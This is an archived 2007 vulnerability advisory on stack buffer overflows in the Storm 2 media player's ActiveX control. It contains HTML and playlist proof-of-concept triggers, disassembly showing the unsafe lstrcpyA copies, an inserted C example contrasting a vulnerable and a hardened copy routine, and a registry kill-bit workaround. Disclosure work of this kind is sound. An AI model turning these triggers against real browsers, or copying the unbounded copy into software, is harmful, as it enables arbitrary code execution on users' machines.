Storm 2 mps.dll component multiple buffer overflow vulnerabilities - vulnerability warning - the black bar safety net

2007-09-10T00:00:00
ID MYHACK58:62200716858
Type myhack58
Reporter Anonymous
Modified 2007-09-10T00:00:00

Description

A Storm ActiveX vulnerability was disclosed online; the method being called was rawParse. A quick look at the control turned up quite a few more problems. Each of them lets the caller control EIP or the SEH chain, so every one of these vulnerabilities can lead to arbitrary code execution.

Affected versions: Storm 2 (others not tested). Unaffected versions: none (no fixed version available at present).

Proofs of concept for the overflows in the URL property, the rawParse method and the advancedOpen method follow:

[Vuln 1]
<html>
<body>
<object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="storm"></object>
<script>
var s = "\x0c";
while (s.length < 300) { s += "\x0c"; }
storm.URL = s;
</script>
</body>
</html>

[Vuln 2]
<html>
<body>
<object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="storm"></object>
<script>
var s = "\x0c";
while (s.length < 300) { s += "\x0c"; }
storm.rawParse(s);
</script>
</body>
</html>

[Vuln 3]
<html>
<body>
<object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="storm"></object>
<script>
var s = "\x0c";
while (s.length < 1050) { s += "\x0c"; }
storm.advancedOpen(s, "");
</script>
</body>
</html>

The overflows in the URL property, the rawParse method and the advancedOpen method are essentially one and the same problem: all three end up calling a function exported by sparser.dll. Judging from the code, this function handles paths and URLs, and the parameters passed in through the URL property and the rawParse method are URLs as well.

.text:10004F40 ; int __stdcall sub_10004F40(LPCSTR lpMultiByteStr,int,int)
.text:10004F40 sub_10004F40 proc near ; DATA XREF: .rdata:1000F2D0o
.text:10004F40
.text:10004F40 var_14 = dword ptr -14h
.text:10004F40 var_10 = dword ptr -10h
.text:10004F40 var_C = dword ptr -0Ch
.text:10004F40 var_4 = dword ptr -4
.text:10004F40 lpMultiByteStr = dword ptr 4
.text:10004F40 arg_8 = dword ptr 0Ch
.text:10004F40
.text:10004F40 mov eax, large fs:0
.text:10004F46 push 0FFFFFFFFh
.text:10004F48 push offset loc_1000EB21
.text:10004F4D push eax
...
.text:1000506D call dword ptr [ecx+4]
.text:10005070 mov ecx, esi
.text:10005072 mov edx, [esp+24h+lpMultiByteStr]
.text:10005076 push edx ; lpMultiByteStr
.text:10005077 call sub_10002450

The function's second and third parameters are pointers to copies of the user-supplied string, and its last line hands that string to another function:

.text:10002450 ; int __stdcall sub_10002450(LPCSTR lpMultiByteStr)
.text:10002450 sub_10002450 proc near ; CODE XREF: sub_10004F40+137p
.text:10002450
.text:10002450 var_12C = dword ptr -12Ch
.text:10002450 pszPath = byte ptr -120h
.text:10002450 var_1C = dword ptr -1Ch
.text:10002450 var_4 = dword ptr -4
.text:10002450 lpMultiByteStr = dword ptr 8
.text:10002450
.text:10002450 push ebp
.text:10002451 mov ebp, esp
.text:10002453 sub esp, 120h ; note: 120h, i.e. 288 bytes, are reserved here for the buffer
...
.text:100024ED mov edi, [ebp+lpMultiByteStr]
.text:100024F0 push edi ; pszPath
.text:100024F1 call ds:PathIsURLA ; check whether this is a well-formed URL
.text:100024F7 test eax, eax
.text:100024F9 jz loc_10002582 ; if not, jump
...
.text:10002582 lea eax, [ebp+pszPath]
.text:10002588 push edi ; user input string
.text:10002589 push eax
.text:1000258A call ds:lstrcpyA ; string copy that causes the stack overflow

The analysis above shows that the program overflows its stack buffer when it handles an over-long (longer than MAX_PATH) illegal URL. Because this is an exported function, any other place in Storm that calls it may have the same problem. Setting a breakpoint on it shows that the Storm main program also calls this function when it processes a URL, with the same result. A playlist file can be constructed to trigger it:

[Vuln 4]
<?xml version="1.0" encoding="GB2312"?>
<PlayList>
<item name="ph4nt0m" time="" path=""/>
</PlayList>
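To make the defect in sub_10002450 concrete, here is a C model of that path handler in both its vulnerable and its hardened shape. This is an added example written for this page, not Storm's or sparser.dll's code: only the 288-byte buffer (from "sub esp, 120h") and the PathIsURLA-then-lstrcpyA sequence are taken from the listing; the function names, the return codes and the portable stand-in for PathIsURLA are assumptions.

```c
#include <stddef.h>
#include <string.h>
#include <stdbool.h>

/* 288 bytes, as reserved by "sub esp, 120h" for pszPath in the listing. */
#define PSZPATH_SIZE 0x120

enum path_result {
    PATH_REJECTED = -1,   /* hardened version only: input does not fit */
    PATH_LOCAL    =  0,   /* treated as a local path and copied */
    PATH_URL      =  1    /* URL test succeeded; the local copy is skipped */
};

/* Hypothetical portable stand-in for shlwapi's PathIsURLA: a string counts as
   a URL if it has a non-empty scheme followed by "://". */
static bool path_is_url(const char *s)
{
    const char *sep = strstr(s, "://");
    return sep != NULL && sep != s;
}

/* Length of s, scanning at most cap bytes, so an over-long or unterminated
   input is never read past cap (strnlen is not in C99, hence the loop). */
static size_t bounded_len(const char *s, size_t cap)
{
    size_t n = 0;
    while (n < cap && s[n] != '\0')
        n++;
    return n;
}

/* Vulnerable shape, as the listing has it: URL check, then an unbounded copy
   into a fixed stack buffer. Any input of 288 bytes or more overwrites what
   follows the buffer (saved registers, return address, SEH record). Kept only
   for comparison; nothing here calls it with oversized input. */
enum path_result handle_path_vulnerable(const char *in)
{
    char pszPath[PSZPATH_SIZE];
    if (path_is_url(in))
        return PATH_URL;
    strcpy(pszPath, in);          /* lstrcpyA equivalent: no length check */
    (void)pszPath;
    return PATH_LOCAL;
}

/* Hardened shape: same buffer and same URL check, but the copy is refused
   unless the whole string plus its terminator fits. The caller gets
   PATH_REJECTED instead of a corrupted stack. */
enum path_result handle_path_hardened(const char *in)
{
    char pszPath[PSZPATH_SIZE];
    if (in == NULL)
        return PATH_REJECTED;
    if (path_is_url(in))
        return PATH_URL;
    size_t n = bounded_len(in, PSZPATH_SIZE);
    if (n >= PSZPATH_SIZE)        /* no room left for the NUL terminator */
        return PATH_REJECTED;
    memcpy(pszPath, in, n + 1);   /* copies the terminator as well */
    (void)pszPath;                /* real code would now use the local path */
    return PATH_LOCAL;
}

/* Constructed test input: len repeated bytes, like the long strings in the
   proofs of concept above. Returns a static buffer. */
const char *make_filler(size_t len)
{
    static char buf[4096];
    if (len >= sizeof buf)
        len = sizeof buf - 1;
    memset(buf, 'A', len);
    buf[len] = '\0';
    return buf;
}
```

The boundary the hardened version enforces is the one the listing implies: 287 bytes plus the terminator is the longest string the 0x120-byte buffer can hold, so a 288-byte input is already rejected, well before the 300-byte strings used in the proofs of concept.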

But that is far from the end of it: mps.dll quite obviously contains the following vulnerabilities as well.

IsDVDPath method:

037EAB8B 56            PUSH ESI
037EAB8C 57            PUSH EDI
037EAB8D 50            PUSH EAX                           ; src
037EAB8E 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110]     ; dest
037EAB94 68 30FE8003   PUSH mps.0380FE30                  ; ASCII "%s\video_ts.ifo"
037EAB99 50            PUSH EAX
037EAB9A E8 F2FA0000   CALL mps.037FA691                  ; copy

[Vuln 5]
<html>
<body>
<object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="storm"></object>
<script>
var s = "\x0c";
while (s.length < 1050) { s += "\x0c"; }
storm.isDVDPath(s);
</script>
</body>
</html>

backImage property:

03FA6D5B  . 8D9E 0C030000   LEA EBX,DWORD PTR DS:[ESI+30C]             <===========
03FA6D84  . FF75 F0         PUSH DWORD PTR SS:[EBP-10]                 ; /String2
03FA6D87  . 8986 08030000   MOV DWORD PTR DS:[ESI+308],EAX             ; |
03FA6D8D  . 53              PUSH EBX                                   ; |String1
03FA6D8E  . FF15 5471FC03   CALL DWORD PTR DS:[<&KERNEL32.lstrcpyA>]   ; \lstrcpyA
03FA6D94  > 8B86 34040000   MOV EAX,DWORD PTR DS:[ESI+434]
03FA6D9A  . 8D8E 34040000   LEA ECX,DWORD PTR DS:[ESI+434]             <===========
03FA6DA0  . 894D 0C         MOV DWORD PTR SS:[EBP+C],ECX
03FA6DA3  . FF50 04         CALL DWORD PTR DS:[EAX+4]

[Vuln 6]
<html>
<body>
<object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="storm"></object>
<script>
var s = "\x0c";
while (s.length < 1050) { s += "\x0c"; }
storm.backImage = s;
</script>
</body>
</html>

titleImage property:

03EA68E7  . FF75 F0         PUSH DWORD PTR SS:[EBP-10]                 ; /String2
03EA68EA  . 8903            MOV DWORD PTR DS:[EBX],EAX                 ; |
03EA68EC  . 8D86 A4010000   LEA EAX,DWORD PTR DS:[ESI+1A4]             ; |
03EA68F2  . 50              PUSH EAX                                   ; |String1
03EA68F3  . FF15 5471EC03   CALL DWORD PTR DS:[<&KERNEL32.lstrcpyA>]   ; \lstrcpyA
03EA68F9  > 8B86 C8020000   MOV EAX,DWORD PTR DS:[ESI+2C8]
03EA68FF  . 8D9E C8020000   LEA EBX,DWORD PTR DS:[ESI+2C8]
03EA6905  . 8BCB            MOV ECX,EBX
03EA6907  . 895D 0C         MOV DWORD PTR SS:[EBP+C],EBX
03EA690A  . FF50 04         CALL DWORD PTR DS:[EAX+4]

[Vuln 7]
<html>
<body>
<object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="storm"></object>
<script>
var s = "\x0c";
while (s.length < 1050) { s += "\x0c"; }
storm.titleImage = s;
</script>
</body>
</html>

As a temporary workaround for the ActiveX control vulnerabilities, set the kill bit (Compatibility Flags value 0x400) on the control's CLSID: save the following as a .reg file and double-click it to import it into the registry.

[Patch]
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB}]
"Compatibility Flags"=dword:00000400

Some time ago Storm announced that it had moved off the MPC core and that most of its code is now its own. While Storm's business is growing fast and new versions ship rapidly, product security has been neglected and left to chance. I have long felt that Storm would have problems, because it contains too many DLLs; whichever file format goes wrong, the result is a serious vulnerability. These vulnerabilities are probably just the tip of the iceberg; keep digging and there is likely more to find. Survival for a fast-growing company is not easy, and I wish Storm well along the way.